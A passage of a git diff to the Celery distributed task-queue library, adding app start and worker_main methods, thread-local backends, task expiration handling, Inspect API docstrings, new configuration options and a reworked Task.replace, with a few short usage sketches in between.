self.on_after_fork = Signal(name='app.on_after_fork')
+    # Boolean signalling whether fast_trace_task is enabled.
+    # This attribute is set in celery.worker.trace and checked by celery.worker.request.
+ self.use_fast_trace_task = False
+
self.on_init()
_register_app(self)
@@ -310,7 +323,7 @@ def on_init(self):
"""Optional callback called at init."""
def __autoset(self, key, value):
- if value:
+ if value is not None:
self._preconf[key] = value
self._preconf_set_by_auto.add(key)
@@ -342,6 +355,41 @@ def close(self):
self._pool = None
_deregister_app(self)
+ def start(self, argv=None):
+ """Run :program:`celery` using `argv`.
+
+ Uses :data:`sys.argv` if `argv` is not specified.
+ """
+ from celery.bin.celery import celery
+
+ celery.params[0].default = self
+
+ if argv is None:
+ argv = sys.argv
+
+ try:
+ celery.main(args=argv, standalone_mode=False)
+ except Exit as e:
+ return e.exit_code
+ finally:
+ celery.params[0].default = None
+
+ def worker_main(self, argv=None):
+ """Run :program:`celery worker` using `argv`.
+
+ Uses :data:`sys.argv` if `argv` is not specified.
+ """
+ if argv is None:
+ argv = sys.argv
+
+ if 'worker' not in argv:
+ raise ValueError(
+ "The worker sub-command must be specified in argv.\n"
+ "Use app.start() to programmatically start other commands."
+ )
+
+ self.start(argv=argv)
+
def task(self, *args, **opts):
"""Decorator to create a task class out of any callable.
@@ -428,6 +476,7 @@ def _task_from_fun(self, fun, name=None, base=None, bind=False, **options):
'_decorated': True,
'__doc__': fun.__doc__,
'__module__': fun.__module__,
+ '__annotations__': fun.__annotations__,
'__header__': staticmethod(head_from_fun(fun, bound=bind)),
'__wrapped__': run}, **options))()
# for some reason __qualname__ cannot be set in type()
@@ -443,7 +492,7 @@ def _task_from_fun(self, fun, name=None, base=None, bind=False, **options):
task = self._tasks[name]
return task
- def register_task(self, task):
+ def register_task(self, task, **options):
"""Utility for registering a task-based class.
Note:
@@ -456,7 +505,7 @@ def register_task(self, task):
task_cls = type(task)
task.name = self.gen_task_name(
task_cls.__name__, task_cls.__module__)
- add_autoretry_behaviour(task)
+ add_autoretry_behaviour(task, **options)
self.tasks[task.name] = task
task._app = self
task.bind(self)
@@ -648,8 +697,8 @@ def _autodiscover_tasks_from_names(self, packages, related_name):
def _autodiscover_tasks_from_fixups(self, related_name):
return self._autodiscover_tasks_from_names([
pkg for fixup in self._fixups
- for pkg in fixup.autodiscover_tasks()
if hasattr(fixup, 'autodiscover_tasks')
+ for pkg in fixup.autodiscover_tasks()
], related_name=related_name)
def send_task(self, name, args=None, kwargs=None, countdown=None,
@@ -680,9 +729,30 @@ def send_task(self, name, args=None, kwargs=None, countdown=None,
'task_always_eager has no effect on send_task',
), stacklevel=2)
- ignored_result = options.pop('ignore_result', False)
+ ignore_result = options.pop('ignore_result', False)
options = router.route(
options, route_name or name, args, kwargs, task_type)
+ if expires is not None:
+ if isinstance(expires, datetime):
+ expires_s = (maybe_make_aware(expires) - self.now()).total_seconds()
+ else:
+ expires_s = expires
+
+ if expires_s < 0:
+ logger.warning(
+ f"{task_id} has an expiration date in the past ({-expires_s}s ago).\n"
+ "We assume this is intended and so we have set the "
+ "expiration date to 0 instead.\n"
+ "According to RabbitMQ's documentation:\n"
+ "\"Setting the TTL to 0 causes messages to be expired upon "
+ "reaching a queue unless they can be delivered to a "
+ "consumer immediately.\"\n"
+ "If this was unintended, please check the code which "
+ "published this task."
+ )
+ expires_s = 0
+
+ options["expiration"] = expires_s
if not root_id or not parent_id:
parent = self.current_worker_task
@@ -700,9 +770,10 @@ def send_task(self, name, args=None, kwargs=None, countdown=None,
task_id, name, args, kwargs, countdown, eta, group_id, group_index,
expires, retries, chord,
maybe_list(link), maybe_list(link_error),
- reply_to or self.oid, time_limit, soft_time_limit,
+ reply_to or self.thread_oid, time_limit, soft_time_limit,
self.conf.task_send_sent_event,
root_id, parent_id, shadow, chain,
+ ignore_result=ignore_result,
argsrepr=options.get('argsrepr'),
kwargsrepr=options.get('kwargsrepr'),
)
@@ -712,14 +783,14 @@ def send_task(self, name, args=None, kwargs=None, countdown=None,
with self.producer_or_acquire(producer) as P:
with P.connection._reraise_as_library_errors():
- if not ignored_result:
+ if not ignore_result:
self.backend.on_task_call(P, task_id)
amqp.send_task_message(P, name, message, **options)
result = (result_cls or self.AsyncResult)(task_id)
# We avoid using the constructor since a custom result class
# can be used, in which case the constructor may still use
# the old signature.
- result.ignored = ignored_result
+ result.ignored = ignore_result
if add_to_parent:
if not have_parent:
@@ -1022,7 +1093,7 @@ def __exit__(self, *exc_info):
self.close()
def __repr__(self):
- return '<{} {}>'.format(type(self).__name__, appstr(self))
+ return f'<{type(self).__name__} {appstr(self)}>'
def __reduce__(self):
if self._using_v1_reduce:
@@ -1158,15 +1229,28 @@ def oid(self):
# which would not work if each thread has a separate id.
return oid_from(self, threads=False)
+ @property
+ def thread_oid(self):
+ """Per-thread unique identifier for this app."""
+ try:
+ return self._local.oid
+ except AttributeError:
+ self._local.oid = new_oid = oid_from(self, threads=True)
+ return new_oid
+
@cached_property
def amqp(self):
"""AMQP related functionality: :class:`~@amqp`."""
return instantiate(self.amqp_cls, app=self)
- @cached_property
+ @property
def backend(self):
"""Current backend instance."""
- return self._get_backend()
+ try:
+ return self._local.backend
+ except AttributeError:
+ self._local.backend = new_backend = self._get_backend()
+ return new_backend
@property
def conf(self):
@@ -1176,7 +1260,7 @@ def conf(self):
return self._conf
@conf.setter
- def conf(self, d): # noqa
+ def conf(self, d):
self._conf = d
@cached_property
@@ -1238,4 +1322,4 @@ def timezone(self):
return timezone.get_timezone(conf.timezone)
-App = Celery # noqa: E305 XXX compat
+App = Celery # XXX compat
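A short usage sketch for the new ``start()`` and ``worker_main()`` methods added above; the project module and argv are illustrative assumptions:

    from celery import Celery

    app = Celery('proj', broker='amqp://')

    if __name__ == '__main__':
        # worker_main() requires 'worker' in argv and delegates to
        # app.start(), which drives the click-based celery CLI.
        app.worker_main(argv=['worker', '--loglevel=INFO'])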
diff --git a/celery/app/control.py b/celery/app/control.py
index 3e5fc65b17c..551ae68bf8b 100644
--- a/celery/app/control.py
+++ b/celery/app/control.py
@@ -2,6 +2,14 @@
Client for worker remote control commands.
Server implementation is in :mod:`celery.worker.control`.
+There are two types of remote control commands:
+
+* Inspect commands: Have no side effects; they usually just return some value
+  found in the worker, such as the list of currently registered tasks or the list of active tasks.
+  These commands are accessible via the :class:`Inspect` class.
+
+* Control commands: Perform side effects, like adding a new queue to consume from.
+  These commands are accessible via the :class:`Control` class.
"""
import warnings
@@ -61,7 +69,11 @@ def _after_fork_cleanup_control(control):
class Inspect:
- """API for app.control.inspect."""
+ """API for inspecting workers.
+
+    This class provides a proxy for accessing the Inspect API of workers. The API
+    is defined in :py:mod:`celery.worker.control`.
+ """
app = None
@@ -103,42 +115,254 @@ def _request(self, command, **kwargs):
))
def report(self):
+ """Return human readable report for each worker.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: {'ok': REPORT_STRING}}``.
+ """
return self._request('report')
def clock(self):
+ """Get the Clock value on workers.
+
+ >>> app.control.inspect().clock()
+ {'celery@node1': {'clock': 12}}
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: CLOCK_VALUE}``.
+ """
return self._request('clock')
def active(self, safe=None):
- # safe is ignored since 4.0
- # as no objects will need serialization now that we
- # have argsrepr/kwargsrepr.
- return self._request('active')
+ """Return list of tasks currently executed by workers.
+
+ Arguments:
+ safe (Boolean): Set to True to disable deserialization.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: [TASK_INFO,...]}``.
+
+ See Also:
+ For ``TASK_INFO`` details see :func:`query_task` return value.
+
+ """
+ return self._request('active', safe=safe)
def scheduled(self, safe=None):
+ """Return list of scheduled tasks with details.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: [TASK_SCHEDULED_INFO,...]}``.
+
+ Here is the list of ``TASK_SCHEDULED_INFO`` fields:
+
+ * ``eta`` - scheduled time for task execution as string in ISO 8601 format
+ * ``priority`` - priority of the task
+ * ``request`` - field containing ``TASK_INFO`` value.
+
+ See Also:
+ For more details about ``TASK_INFO`` see :func:`query_task` return value.
+ """
return self._request('scheduled')
def reserved(self, safe=None):
+ """Return list of currently reserved tasks, not including scheduled/active.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: [TASK_INFO,...]}``.
+
+ See Also:
+ For ``TASK_INFO`` details see :func:`query_task` return value.
+ """
return self._request('reserved')
def stats(self):
+ """Return statistics of worker.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: STAT_INFO}``.
+
+ Here is the list of ``STAT_INFO`` fields:
+
+ * ``broker`` - Section for broker information.
+ * ``connect_timeout`` - Timeout in seconds (int/float) for establishing a new connection.
+ * ``heartbeat`` - Current heartbeat value (set by client).
+ * ``hostname`` - Node name of the remote broker.
+ * ``insist`` - No longer used.
+ * ``login_method`` - Login method used to connect to the broker.
+ * ``port`` - Port of the remote broker.
+ * ``ssl`` - SSL enabled/disabled.
+ * ``transport`` - Name of transport used (e.g., amqp or redis)
+ * ``transport_options`` - Options passed to transport.
+        * ``uri_prefix`` - Some transports expect the host name to be a URL.
+ E.g. ``redis+socket:///tmp/redis.sock``.
+ In this example the URI-prefix will be redis.
+ * ``userid`` - User id used to connect to the broker with.
+ * ``virtual_host`` - Virtual host used.
+ * ``clock`` - Value of the workers logical clock. This is a positive integer
+ and should be increasing every time you receive statistics.
+        * ``uptime`` - Number of seconds since the worker controller was started.
+ * ``pid`` - Process id of the worker instance (Main process).
+ * ``pool`` - Pool-specific section.
+ * ``max-concurrency`` - Max number of processes/threads/green threads.
+ * ``max-tasks-per-child`` - Max number of tasks a thread may execute before being recycled.
+            * ``processes`` - List of PIDs (or thread ids).
+ * ``put-guarded-by-semaphore`` - Internal
+ * ``timeouts`` - Default values for time limits.
+ * ``writes`` - Specific to the prefork pool, this shows the distribution
+ of writes to each process in the pool when using async I/O.
+ * ``prefetch_count`` - Current prefetch count value for the task consumer.
+ * ``rusage`` - System usage statistics. The fields available may be different on your platform.
+ From :manpage:`getrusage(2)`:
+
+ * ``stime`` - Time spent in operating system code on behalf of this process.
+ * ``utime`` - Time spent executing user instructions.
+ * ``maxrss`` - The maximum resident size used by this process (in kilobytes).
+ * ``idrss`` - Amount of non-shared memory used for data (in kilobytes times
+ ticks of execution)
+ * ``isrss`` - Amount of non-shared memory used for stack space
+ (in kilobytes times ticks of execution)
+ * ``ixrss`` - Amount of memory shared with other processes
+ (in kilobytes times ticks of execution).
+ * ``inblock`` - Number of times the file system had to read from the disk
+ on behalf of this process.
+ * ``oublock`` - Number of times the file system has to write to disk
+ on behalf of this process.
+ * ``majflt`` - Number of page faults that were serviced by doing I/O.
+ * ``minflt`` - Number of page faults that were serviced without doing I/O.
+ * ``msgrcv`` - Number of IPC messages received.
+ * ``msgsnd`` - Number of IPC messages sent.
+ * ``nvcsw`` - Number of times this process voluntarily invoked a context switch.
+ * ``nivcsw`` - Number of times an involuntary context switch took place.
+ * ``nsignals`` - Number of signals received.
+ * ``nswap`` - The number of times this process was swapped entirely
+ out of memory.
+ * ``total`` - Map of task names and the total number of tasks with that type
+ the worker has accepted since start-up.
+ """
return self._request('stats')
def revoked(self):
+ """Return list of revoked tasks.
+
+ >>> app.control.inspect().revoked()
+ {'celery@node1': ['16f527de-1c72-47a6-b477-c472b92fef7a']}
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: [TASK_ID, ...]}``.
+ """
return self._request('revoked')
def registered(self, *taskinfoitems):
+ """Return all registered tasks per worker.
+
+ >>> app.control.inspect().registered()
+    {'celery@node1': ['task1', 'task2']}
+    >>> app.control.inspect().registered('serializer', 'max_retries')
+    {'celery@node1': ['task_foo [serializer=json max_retries=3]', 'task_bar [serializer=json max_retries=3]']}
+
+ Arguments:
+ taskinfoitems (Sequence[str]): List of :class:`~celery.app.task.Task`
+ attributes to include.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: [TASK1_INFO, ...]}``.
+ """
return self._request('registered', taskinfoitems=taskinfoitems)
registered_tasks = registered
def ping(self, destination=None):
+ """Ping all (or specific) workers.
+
+ >>> app.control.inspect().ping()
+ {'celery@node1': {'ok': 'pong'}, 'celery@node2': {'ok': 'pong'}}
+ >>> app.control.inspect().ping(destination=['celery@node1'])
+ {'celery@node1': {'ok': 'pong'}}
+
+ Arguments:
+ destination (List): If set, a list of the hosts to send the
+ command to, when empty broadcast to all workers.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: {'ok': 'pong'}}``.
+
+ See Also:
+ :meth:`broadcast` for supported keyword arguments.
+ """
if destination:
self.destination = destination
return self._request('ping')
def active_queues(self):
+ """Return information about queues from which worker consumes tasks.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: [QUEUE_INFO, QUEUE_INFO,...]}``.
+
+ Here is the list of ``QUEUE_INFO`` fields:
+
+ * ``name``
+ * ``exchange``
+ * ``name``
+ * ``type``
+ * ``arguments``
+ * ``durable``
+ * ``passive``
+ * ``auto_delete``
+ * ``delivery_mode``
+ * ``no_declare``
+ * ``routing_key``
+ * ``queue_arguments``
+ * ``binding_arguments``
+ * ``consumer_arguments``
+ * ``durable``
+ * ``exclusive``
+ * ``auto_delete``
+ * ``no_ack``
+ * ``alias``
+ * ``bindings``
+ * ``no_declare``
+ * ``expires``
+ * ``message_ttl``
+ * ``max_length``
+ * ``max_length_bytes``
+ * ``max_priority``
+
+ See Also:
+ See the RabbitMQ/AMQP documentation for more details about
+ ``queue_info`` fields.
+ Note:
+ The ``queue_info`` fields are RabbitMQ/AMQP oriented.
+            Not all fields apply to other transports.
+ """
return self._request('active_queues')
def query_task(self, *ids):
+ """Return detail of tasks currently executed by workers.
+
+ Arguments:
+ *ids (str): IDs of tasks to be queried.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: {TASK_ID: [STATE, TASK_INFO]}}``.
+
+ Here is the list of ``TASK_INFO`` fields:
+ * ``id`` - ID of the task
+ * ``name`` - Name of the task
+        * ``args`` - Positional arguments passed to the task
+ * ``kwargs`` - Keyword arguments passed to the task
+ * ``type`` - Type of the task
+ * ``hostname`` - Hostname of the worker processing the task
+ * ``time_start`` - Time of processing start
+ * ``acknowledged`` - True when task was acknowledged to broker
+ * ``delivery_info`` - Dictionary containing delivery information
+ * ``exchange`` - Name of exchange where task was published
+ * ``routing_key`` - Routing key used when task was published
+ * ``priority`` - Priority used when task was published
+ * ``redelivered`` - True if the task was redelivered
+        * ``worker_pid`` - PID of the worker processing the task
+
+ """
# signature used be unary: query_task(ids=[id1, id2])
# we need this to preserve backward compatibility.
if len(ids) == 1 and isinstance(ids[0], (list, tuple)):
@@ -146,18 +370,54 @@ def query_task(self, *ids):
return self._request('query_task', ids=ids)
def conf(self, with_defaults=False):
+ """Return configuration of each worker.
+
+ Arguments:
+            with_defaults (bool): if set to True, the method also returns
+                configuration options with default values.
+
+ Returns:
+ Dict: Dictionary ``{HOSTNAME: WORKER_CONFIGURATION}``.
+
+ See Also:
+ ``WORKER_CONFIGURATION`` is a dictionary containing current configuration options.
+ See :ref:`configuration` for possible values.
+ """
return self._request('conf', with_defaults=with_defaults)
def hello(self, from_node, revoked=None):
return self._request('hello', from_node=from_node, revoked=revoked)
def memsample(self):
+ """Return sample current RSS memory usage.
+
+ Note:
+ Requires the psutils library.
+ """
return self._request('memsample')
def memdump(self, samples=10):
+ """Dump statistics of previous memsample requests.
+
+ Note:
+            Requires the psutil library.
+ """
return self._request('memdump', samples=samples)
def objgraph(self, type='Request', n=200, max_depth=10):
+ """Create graph of uncollected objects (memory-leak debugging).
+
+ Arguments:
+ n (int): Max number of objects to graph.
+ max_depth (int): Traverse at most n levels deep.
+ type (str): Name of object to graph. Default is ``"Request"``.
+
+ Returns:
+ Dict: Dictionary ``{'filename': FILENAME}``
+
+ Note:
+ Requires the objgraph library.
+ """
return self._request('objgraph', num=n, max_depth=max_depth, type=type)
@@ -171,7 +431,8 @@ def __init__(self, app=None):
self.mailbox = self.Mailbox(
app.conf.control_exchange,
type='fanout',
- accept=['json'],
+ accept=app.conf.accept_content,
+ serializer=app.conf.task_serializer,
producer_pool=lazy(lambda: self.app.amqp.producer_pool),
queue_ttl=app.conf.control_queue_ttl,
reply_queue_ttl=app.conf.control_queue_ttl,
@@ -185,6 +446,7 @@ def _after_fork(self):
@cached_property
def inspect(self):
+ """Create new :class:`Inspect` instance."""
return self.app.subclass_with_self(Inspect, reverse='control.inspect')
def purge(self, connection=None):
@@ -252,8 +514,13 @@ def terminate(self, task_id,
def ping(self, destination=None, timeout=1.0, **kwargs):
"""Ping all (or specific) workers.
+ >>> app.control.ping()
+ [{'celery@node1': {'ok': 'pong'}}, {'celery@node2': {'ok': 'pong'}}]
+ >>> app.control.ping(destination=['celery@node2'])
+ [{'celery@node2': {'ok': 'pong'}}]
+
Returns:
- List[Dict]: List of ``{'hostname': reply}`` dictionaries.
+ List[Dict]: List of ``{HOSTNAME: {'ok': 'pong'}}`` dictionaries.
See Also:
:meth:`broadcast` for supported keyword arguments.
@@ -269,7 +536,7 @@ def rate_limit(self, task_name, rate_limit, destination=None, **kwargs):
task_name (str): Name of task to change rate limit for.
rate_limit (int, str): The rate limit as tasks per second,
or a rate limit string (`'100/m'`, etc.
- see :attr:`celery.task.base.Task.rate_limit` for
+ see :attr:`celery.app.task.Task.rate_limit` for
more information).
See Also:
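A hedged sketch exercising a few of the Inspect methods documented above; the app setup is an illustrative assumption, and the comments only indicate the general shape of the replies:

    from celery import Celery

    app = Celery('proj', broker='amqp://')
    insp = app.control.inspect()

    insp.ping()        # {'celery@node1': {'ok': 'pong'}, ...}
    insp.active()      # tasks currently executed by each worker
    insp.registered()  # registered task names per worker
    insp.stats()       # broker/pool/rusage statistics per worker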
diff --git a/celery/app/defaults.py b/celery/app/defaults.py
index d0fa9d20b54..596c750f2b5 100644
--- a/celery/app/defaults.py
+++ b/celery/app/defaults.py
@@ -132,6 +132,9 @@ def __repr__(self):
retry_initial_backoff_sec=Option(2, type='int'),
retry_increment_base=Option(2, type='int'),
retry_max_attempts=Option(3, type='int'),
+ base_path=Option('', type='string'),
+ connection_timeout=Option(20, type='int'),
+ read_timeout=Option(120, type='int'),
),
control=Namespace(
queue_ttl=Option(300.0, type='float'),
@@ -175,6 +178,7 @@ def __repr__(self):
db=Option(type='int'),
host=Option(type='string'),
max_connections=Option(type='int'),
+ username=Option(type='string'),
password=Option(type='string'),
port=Option(type='int'),
socket_timeout=Option(120.0, type='float'),
@@ -255,6 +259,7 @@ def __repr__(self):
False, type='bool', old={'celery_eager_propagates_exceptions'},
),
ignore_result=Option(False, type='bool'),
+ store_eager_result=Option(False, type='bool'),
protocol=Option(2, type='int', old={'celery_task_protocol'}),
publish_retry=Option(
True, type='bool', old={'celery_task_publish_retry'},
@@ -267,7 +272,6 @@ def __repr__(self):
type='dict', old={'celery_task_publish_retry_policy'},
),
queues=Option(type='dict'),
- queue_ha_policy=Option(None, type='string'),
queue_max_priority=Option(None, type='int'),
reject_on_worker_lost=Option(type='bool'),
remote_tracebacks=Option(False, type='bool'),
@@ -289,12 +293,18 @@ def __repr__(self):
__old__=OLD_NS_WORKER,
agent=Option(None, type='string'),
autoscaler=Option('celery.worker.autoscale:Autoscaler'),
- concurrency=Option(0, type='int'),
+ cancel_long_running_tasks_on_connection_loss=Option(
+ False, type='bool'
+ ),
+ concurrency=Option(None, type='int'),
consumer=Option('celery.worker.consumer:Consumer', type='string'),
direct=Option(False, type='bool', old={'celery_worker_direct'}),
disable_rate_limits=Option(
False, type='bool', old={'celery_disable_rate_limits'},
),
+ deduplicate_successful_tasks=Option(
+ False, type='bool'
+ ),
enable_remote_control=Option(
True, type='bool', old={'celery_enable_remote_control'},
),
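A hedged configuration sketch using a few of the options introduced above, written with the flat setting names derived from their namespaces; the values are illustrative:

    from celery import Celery

    app = Celery('proj', broker='amqp://', backend='redis://')

    app.conf.update(
        task_store_eager_result=True,  # store results for eagerly executed tasks
        worker_cancel_long_running_tasks_on_connection_loss=True,
        worker_deduplicate_successful_tasks=True,
    )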
diff --git a/celery/app/log.py b/celery/app/log.py
index d27a85ee559..4ca9bc7ccd1 100644
--- a/celery/app/log.py
+++ b/celery/app/log.py
@@ -41,7 +41,7 @@ def format(self, record):
else:
record.__dict__.setdefault('task_name', '???')
record.__dict__.setdefault('task_id', '???')
- return ColorFormatter.format(self, record)
+ return super().format(record)
class Logging:
@@ -226,7 +226,7 @@ def _detect_handler(self, logfile=None):
logfile = sys.__stderr__ if logfile is None else logfile
if hasattr(logfile, 'write'):
return logging.StreamHandler(logfile)
- return WatchedFileHandler(logfile)
+ return WatchedFileHandler(logfile, encoding='utf-8')
def _has_handler(self, logger):
return any(
@@ -245,6 +245,6 @@ def get_default_logger(self, name='celery', **kwargs):
def already_setup(self):
return self._setup
- @already_setup.setter # noqa
+ @already_setup.setter
def already_setup(self, was_setup):
self._setup = was_setup
diff --git a/celery/app/registry.py b/celery/app/registry.py
index 574457a6cba..707567d1571 100644
--- a/celery/app/registry.py
+++ b/celery/app/registry.py
@@ -36,7 +36,7 @@ def unregister(self, name):
Arguments:
name (str): name of the task to unregister, or a
- :class:`celery.task.base.Task` with a valid `name` attribute.
+ :class:`celery.app.task.Task` with a valid `name` attribute.
Raises:
celery.exceptions.NotRegistered: if the task is not registered.
diff --git a/celery/app/routes.py b/celery/app/routes.py
index 348c8880351..a56ce59e00b 100644
--- a/celery/app/routes.py
+++ b/celery/app/routes.py
@@ -2,8 +2,8 @@
Contains utilities for working with task routers, (:setting:`task_routes`).
"""
+import fnmatch
import re
-import string
from collections import OrderedDict
from collections.abc import Mapping
@@ -23,11 +23,6 @@
__all__ = ('MapRoute', 'Router', 'prepare')
-def glob_to_re(glob, quote=string.punctuation.replace('*', '')):
- glob = ''.join('\\' + c if c in quote else c for c in glob)
- return glob.replace('*', '.+?')
-
-
class MapRoute:
"""Creates a router out of a :class:`dict`."""
@@ -39,7 +34,7 @@ def __init__(self, map):
if isinstance(k, Pattern):
self.patterns[k] = v
elif '*' in k:
- self.patterns[re.compile(glob_to_re(k))] = v
+ self.patterns[re.compile(fnmatch.translate(k))] = v
else:
self.map[k] = v
@@ -126,6 +121,7 @@ def expand_router_string(router):
def prepare(routes):
"""Expand the :setting:`task_routes` setting."""
+
def expand_route(route):
if isinstance(route, (Mapping, list, tuple)):
return MapRoute(route)
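A hedged sketch of glob-style routing, which MapRoute now compiles with ``fnmatch.translate()`` instead of the removed ``glob_to_re()`` helper; the task and queue names are illustrative assumptions:

    from celery import Celery

    app = Celery('proj', broker='amqp://')
    app.conf.task_routes = {
        'feed.tasks.*': {'queue': 'feeds'},   # glob key -> fnmatch-translated regex
        'video.encode': {'queue': 'video'},   # exact key -> plain dict lookup
    }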
diff --git a/celery/app/task.py b/celery/app/task.py
index 86c4e727d49..9a6796e6bb3 100644
--- a/celery/app/task.py
+++ b/celery/app/task.py
@@ -6,9 +6,9 @@
from kombu.exceptions import OperationalError
from kombu.utils.uuid import uuid
-from celery import current_app, group, states
+from celery import current_app, states
from celery._state import _task_stack
-from celery.canvas import signature
+from celery.canvas import _chain, group, signature
from celery.exceptions import (Ignore, ImproperlyConfigured,
MaxRetriesExceededError, Reject, Retry)
from celery.local import class_property
@@ -61,35 +61,39 @@ def _reprtask(task, fmt=None, flags=None):
class Context:
"""Task request variables (Task.request)."""
- logfile = None
- loglevel = None
- hostname = None
- id = None
+ _children = None # see property
+ _protected = 0
args = None
- kwargs = None
- retries = 0
+ callbacks = None
+ called_directly = True
+ chain = None
+ chord = None
+ correlation_id = None
+ delivery_info = None
+ errbacks = None
eta = None
expires = None
- is_eager = False
+ group = None
+ group_index = None
headers = None
- delivery_info = None
+ hostname = None
+ id = None
+ ignore_result = False
+ is_eager = False
+ kwargs = None
+ logfile = None
+ loglevel = None
+ origin = None
+ parent_id = None
+ properties = None
+ retries = 0
reply_to = None
+ replaced_task_nesting = 0
root_id = None
- parent_id = None
- correlation_id = None
+ shadow = None
taskset = None # compat alias to group
- group = None
- group_index = None
- chord = None
- chain = None
- utc = None
- called_directly = True
- callbacks = None
- errbacks = None
timelimit = None
- origin = None
- _children = None # see property
- _protected = 0
+ utc = None
def __init__(self, *args, **kwargs):
self.update(*args, **kwargs)
@@ -104,7 +108,7 @@ def get(self, key, default=None):
return getattr(self, key, default)
def __repr__(self):
-        return '<Context: {!r}>'.format(vars(self))
+        return f'<Context: {vars(self)!r}>'
def as_execution_options(self):
limit_hard, limit_soft = self.timelimit or (None, None)
@@ -114,6 +118,7 @@ def as_execution_options(self):
'parent_id': self.parent_id,
'group_id': self.group,
'group_index': self.group_index,
+ 'shadow': self.shadow,
'chord': self.chord,
'chain': self.chain,
'link': self.callbacks,
@@ -124,6 +129,7 @@ def as_execution_options(self):
'headers': self.headers,
'retries': self.retries,
'reply_to': self.reply_to,
+ 'replaced_task_nesting': self.replaced_task_nesting,
'origin': self.origin,
}
@@ -219,9 +225,6 @@ class Task:
#: The result store backend used for this task.
backend = None
- #: If disabled this task won't be registered automatically.
- autoregister = True
-
#: If enabled the task will report its status as 'started' when the task
#: is executed by a worker. Disabled by default as the normal behavior
#: is to not report that level of granularity. Tasks are either pending,
@@ -309,6 +312,7 @@ class Task:
('acks_on_failure_or_timeout', 'task_acks_on_failure_or_timeout'),
('reject_on_worker_lost', 'task_reject_on_worker_lost'),
('ignore_result', 'task_ignore_result'),
+ ('store_eager_result', 'task_store_eager_result'),
('store_errors_even_if_ignored', 'task_store_errors_even_if_ignored'),
)
@@ -455,6 +459,11 @@ def apply_async(self, args=None, kwargs=None, task_id=None, producer=None,
retry_policy (Mapping): Override the retry policy used.
See the :setting:`task_publish_retry_policy` setting.
+ time_limit (int): If set, overrides the default time limit.
+
+ soft_time_limit (int): If set, overrides the default soft
+ time limit.
+
queue (str, kombu.Queue): The queue to route the task to.
This must be a key present in :setting:`task_queues`, or
:setting:`task_create_missing_queues` must be
@@ -499,6 +508,11 @@ def apply_async(self, args=None, kwargs=None, task_id=None, producer=None,
attribute. Trailing can also be disabled by default using the
:attr:`trail` attribute
+ ignore_result (bool): If set to `False` (default) the result
+ of a task will be stored in the backend. If set to `True`
+ the result will not be stored. This can also be set
+ using the :attr:`ignore_result` in the `app.task` decorator.
+
publisher (kombu.Producer): Deprecated alias to ``producer``.
headers (Dict): Message headers to be included in the message.
@@ -675,6 +689,8 @@ def retry(self, args=None, kwargs=None, exc=None, throw=True,
"""
request = self.request
retries = request.retries + 1
+ if max_retries is not None:
+ self.override_max_retries = max_retries
max_retries = self.max_retries if max_retries is None else max_retries
# Not in worker or emulated by (apply/always_eager),
@@ -761,7 +777,13 @@ def apply(self, args=None, kwargs=None,
'callbacks': maybe_list(link),
'errbacks': maybe_list(link_error),
'headers': headers,
- 'delivery_info': {'is_eager': True},
+ 'ignore_result': options.get('ignore_result', False),
+ 'delivery_info': {
+ 'is_eager': True,
+ 'exchange': options.get('exchange'),
+ 'routing_key': options.get('routing_key'),
+ 'priority': options.get('priority'),
+ },
}
tb = None
tracer = build_tracer(
@@ -862,7 +884,7 @@ def replace(self, sig):
.. versionadded:: 4.0
Arguments:
- sig (~@Signature): signature to replace with.
+ sig (Signature): signature to replace with.
Raises:
~@Ignore: This is always raised when called in asynchronous context.
@@ -874,25 +896,42 @@ def replace(self, sig):
raise ImproperlyConfigured(
"A signature replacing a task must not be part of a chord"
)
+ if isinstance(sig, _chain) and not getattr(sig, "tasks", True):
+ raise ImproperlyConfigured("Cannot replace with an empty chain")
+ # Ensure callbacks or errbacks from the replaced signature are retained
if isinstance(sig, group):
- sig |= self.app.tasks['celery.accumulate'].s(index=0).set(
- link=self.request.callbacks,
- link_error=self.request.errbacks,
- )
-
- if self.request.chain:
- for t in reversed(self.request.chain):
- sig |= signature(t, app=self.app)
-
+ # Groups get uplifted to a chord so that we can link onto the body
+ sig |= self.app.tasks['celery.accumulate'].s(index=0)
+ for callback in maybe_list(self.request.callbacks) or []:
+ sig.link(callback)
+ for errback in maybe_list(self.request.errbacks) or []:
+ sig.link_error(errback)
+ # If the replacement signature is a chain, we need to push callbacks
+ # down to the final task so they run at the right time even if we
+ # proceed to link further tasks from the original request below
+ if isinstance(sig, _chain) and "link" in sig.options:
+ final_task_links = sig.tasks[-1].options.setdefault("link", [])
+ final_task_links.extend(maybe_list(sig.options["link"]))
+ # We need to freeze the replacement signature with the current task's
+ # ID to ensure that we don't disassociate it from the existing task IDs
+ # which would break previously constructed results objects.
+ sig.freeze(self.request.id)
+ # Ensure the important options from the original signature are retained
+ replaced_task_nesting = self.request.get('replaced_task_nesting', 0) + 1
sig.set(
chord=chord,
group_id=self.request.group,
group_index=self.request.group_index,
root_id=self.request.root_id,
+ replaced_task_nesting=replaced_task_nesting
)
- sig.freeze(self.request.id)
-
+ # If the task being replaced is part of a chain, we need to re-create
+ # it with the replacement signature - these subsequent tasks will
+ # retain their original task IDs as well
+ for t in reversed(self.request.chain or []):
+ sig |= signature(t, app=self.app)
+ # Finally, either apply or delay the new signature!
if self.request.is_eager:
return sig.apply().get()
else:
@@ -907,7 +946,7 @@ def add_to_chord(self, sig, lazy=False):
Currently only supported by the Redis result backend.
Arguments:
- sig (~@Signature): Signature to extend chord with.
+ sig (Signature): Signature to extend chord with.
lazy (bool): If enabled the new task won't actually be called,
and ``sig.delay()`` must be called manually.
"""
@@ -934,7 +973,22 @@ def update_state(self, task_id=None, state=None, meta=None, **kwargs):
"""
if task_id is None:
task_id = self.request.id
- self.backend.store_result(task_id, meta, state, request=self.request, **kwargs)
+ self.backend.store_result(
+ task_id, meta, state, request=self.request, **kwargs)
+
+ def before_start(self, task_id, args, kwargs):
+ """Handler called before the task starts.
+
+ .. versionadded:: 5.2
+
+ Arguments:
+ task_id (str): Unique id of the task to execute.
